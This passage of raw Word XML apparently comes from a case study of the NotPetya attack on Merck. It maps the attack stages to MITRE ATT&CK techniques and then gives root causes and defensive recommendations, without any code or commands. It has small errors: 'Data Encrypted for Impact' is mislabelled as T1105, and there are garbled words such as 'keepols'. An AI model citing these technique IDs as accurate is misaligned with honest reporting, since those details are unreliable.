    <w:p w14:paraId="0423038E" w14:textId="2B98F45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 covert alteration of a software update for the Ukrainian tax application M.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E.Doc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> was the first step in the attack. The installation of the update enabled the malware to enter the enterprise networks directly</w:t>
      </w:r>
      <w:r w:rsidR="007E57E5" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4C1429"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2. T1204 — User Execution (Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AE3DDD" w14:textId="0E00DFB2"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After the malicious update, users installed it normally. This allowed the malware to run with trusted system privileges </w:t>
      </w:r>
      <w:r w:rsidR="007E57E5" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[3].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52882060"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3. T1210 / T1068 — Exploitation of Remote Services / Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4EDB97" w14:textId="3467F7BC"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 xml:space="preserve">Unpatched Windows systems were </w:t>
      </w:r>
      <w:r w:rsidR="00112949" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">targeted by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00112949" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NotPetya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00112949" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> through the exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB flaw (CVE-2017-0144). Hence, it allows the malware to implant itself and escalate its privileges </w:t>
      </w:r>
      <w:r w:rsidR="00112949" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[11].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4B0C1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4. T1003 — OS Credential Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791BBF32" w14:textId="3C49956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malware </w:t>
      </w:r>
      <w:r w:rsidR="00112949" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">extracted passwords from memory with the aid of a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00112949" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00112949" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-like program, allowing for the use of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">actual employee usernames and passwords for further distribution </w:t>
      </w:r>
      <w:r w:rsidR="007E57E5" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[3].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3882D022"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5. T1021.002 — SMB/Windows Admin Shares (Lateral Movement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7782A5" w14:textId="596DB0DC"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with the help of the acquired passwords entered the network laterally, thus using SMB,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and WMI it reached more servers and workstations </w:t>
      </w:r>
      <w:r w:rsidR="007E57E5" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[3].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDBA2B2"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6. T1105 — Ingress Tool Transfer (Internal Propagation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FD6DB1" w14:textId="46D32AA3" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="007E57E5"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malware automatically copied itself to new systems and executed without even connecting to any external command server [3].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2565EFC7"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 xml:space="preserve">7. T1105 — Data Encrypted for Impact / Wiper </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Impact)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AC5BEA" w14:textId="77777777"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instead of real ransomware, destroyed data by overwriting the MBR and making the Master File Table unusable, as per METRE (2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394F09C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8. T1490 — Inhibit System Recovery (Impact):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28380FF6" w14:textId="07FA886E"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System damage was followed by information concerning recovery and boot records being deleted, thus, repairs becoming almost impossible</w:t>
      </w:r>
      <w:r w:rsidR="007E57E5" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C907F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9. T1083 — File and Directory Discovery (Discovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00436008" w14:textId="6C6168C1" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="007E57E5"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malware was scanning the network paths and file shares to locate and attack new systems [3].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C7C975"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10. T1070.004 — Indicator Removal on Host (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128849FA" w14:textId="21B0D710" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="007E57E5"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It was purging Windows event logs and journal files to execute its activity</w:t>
      </w:r>
      <w:r w:rsidR="00B96FF4" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hiding [3].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118AADBA"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b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Implication for victims (Merck &amp; Co.)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserv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resulted in a huge shutdown and recovery period at Merck due to its combination of supply-chain compromise, credential theft, aggressive lateral spreading, and destructive wiping. The application of ATT&amp;CK to these steps will help companies to identify vulnerabilities in their systems and accordingly improve their security measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10376B00" w14:textId="4776CAAE" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00B40682" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc215851836"/>
      <w:bookmarkStart w:id="11" w:name="_Toc216881398"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IV.  Root Cause Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="39109BD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Technical Weaknesses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3773D3" w14:textId="35781C9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One of the technical factors that led to the agreement made by Merck was the existence of vulnerable Windows systems that had not been patched, thus still susceptible to the MS17-010 SMB flaw, which is commonly referred to as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Even though Microsoft had made the patch available in March 2017, a number of organizations, Merck included, still had unpatched or outdated devices on both their office and production networks at the time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attacked </w:t>
      </w:r>
      <w:r w:rsidR="007E57E5" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> This permitted the malware to propagate quickly by taking a worm-like approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636354FE" w14:textId="46D4802D"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in its turn, extensively used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and WMI for propagation, which meant attackers had to possess admin credentials first. Poor protection of LSASS memory was the reason why the malware could dump credentials and further authenticate by using stolen accounts </w:t>
      </w:r>
      <w:r w:rsidR="00072E1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[7].</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Furthermore, the attack surface was considerably enlarged by the prevalence of misconfigured or outdated SMBv1 services. Also, the lack of application whitelisting and the limited endpoint </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> monitoring combined to make </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NotPetya’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> destructive actions, like overwriting the Master Boot Record (MBR) — go unblocked. The weakness patterns that were present such as inconsistent patching, overly permissive service configurations, and insufficient endpoint controls worked together to set a scenario where a single compromised software update could turn into a global outage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C09153"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Architectural Issues:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A94236D" w14:textId="0C93AE36"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During that period, the network architecture of Merck was very much interconnected, and the office IT systems, research networks and manufacturing environments were connected to one another. So,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took advantage of the "flat" architecture and in no time the malware spread widely over the network. This was because very few barriers of isolation were routing the malware from one part of the network to another so that it could easily reach the vaccine production lines and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>keepols</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D2DE4" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[7].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401FD34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 xml:space="preserve">In many cases, legacy manufacturing and laboratory systems were very much dependent on out-of-date Windows versions which were difficult to upgrade and had no security provisions at all. The shared file servers, the centralized Active Directory domains, and the interconnections between on-premise and cloud resources increased the possible impact of a theft of credentials. Therefore,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was able to go from a small crisis at one location to a global disruption which pointed out the vulnerabilities of pharmaceutical companies having poor segmentation of their infrastructures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF8497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Human Factors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132746CE"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Although phishing is not being used for entry in this case, several human and organisational issues increased Merck’s exposure. The use of third-party software, in this case M.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E.Doc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, was a factor that created a supply-chain risk. The patch-management processes did not manage to guarantee that the critical updates such as MS17-010 were correctly and timely deployed across all international systems. Furthermore, the attackers were able to move around the network and increase their privileges much more easily due to the common practice of using shared admin credentials and password recycling. The gaps created by humans were a big factor in the overall impact of the incident being so high.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D407E1" w14:textId="1614FE3C" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00B40682" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc215851837"/>
      <w:bookmarkStart w:id="13" w:name="_Toc216881399"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>V. Strategic Defensive Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="353F21AC"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Prevention Controls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FBA2A4" w14:textId="0C009762"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To prevent incidents like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identity, patching, and endpoint protection need to be tightly controlled. Among the measures is the implementation of Multi-Factor Authentication that is mandatory for all privileged accounts which is one of the NIST SP 800-53 identity requirements </w:t>
      </w:r>
      <w:r w:rsidR="00421EBC" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[12].</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Timely and uniform patching of unacceptable vulnerabilities, for example, MS17-010, is very critical in the process of reducing a system's chance of being exploited, and these practices are in line with the NIST recommendations for remediation </w:t>
      </w:r>
      <w:r w:rsidR="00421EBC" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[12]. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">System hardening measures including disabling SMBv1, limiting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and WMI use, and applying application allow-listing should be adopted in order to make the attack surface smaller. A Zero Trust framework adoption comes as an extra layer of security since it eliminates the presumptive internal trust, which is extremely necessary for curbing supply-chain and credential-theft risks </w:t>
      </w:r>
      <w:r w:rsidR="006847FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[13].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9B61A4"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Detection &amp; Monitoring Improvements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFDB848" w14:textId="7BBD72C8"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Detecting the threats of credential theft, lateral movement, and destructive malware is only possible with high-quality detection capabilities. It is very important that the SIEM solutions gather together and correlate the Windows Event Logs, authentication logs, and network telemetry in order to catch the anomalies even sooner. The enterprise-wide EDR/XDR tools provide a good foundation for the detection of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>behaviors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> like accessing the LSASS memory, launching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misusing WMI, and performing unusual SMB scanning; these are the patterns that were observed during the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propagation. The additional monitoring layers like IDS, DNS analytics and NetFlow inspection, are the ones that even more increase the visibility of worm-like activities in the network. The harmonizing of all the detection logic with the MITRE ATT&amp;CK data sources does not only increase the alert accuracy but also speeds up containment </w:t>
      </w:r>
      <w:r w:rsidR="00112949" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[10].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C93649D"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Architectural Enhancements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D87DFA9"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redesign of the architecture is crucial to minimize the overall cross-domain effect in the real organizations. The teams can keep their manufacturing, R&amp;D along with IT and OT environments totally separated to avoid their movement throughout the whole business. The Least-privilege access for administrators, service accounts, and shared resources is one of the most effective measures to limit the use of credentials and to contain lateral movement. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209C1D5B"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Apart from that, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>In</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a hybrid configuration, clouds with good architecture and strong boundaries, private subnets, and well-defined segmentation rules are the ones that prevent exposure to a minimum. Moreover, there are some resilient backup strategies like offline copies, immutable storage, and recovery regularly practised, which help to make sure that the business can operate even if the main systems are down. All these measures create a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-in-depth that is practical and human-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>centered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201EE010" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
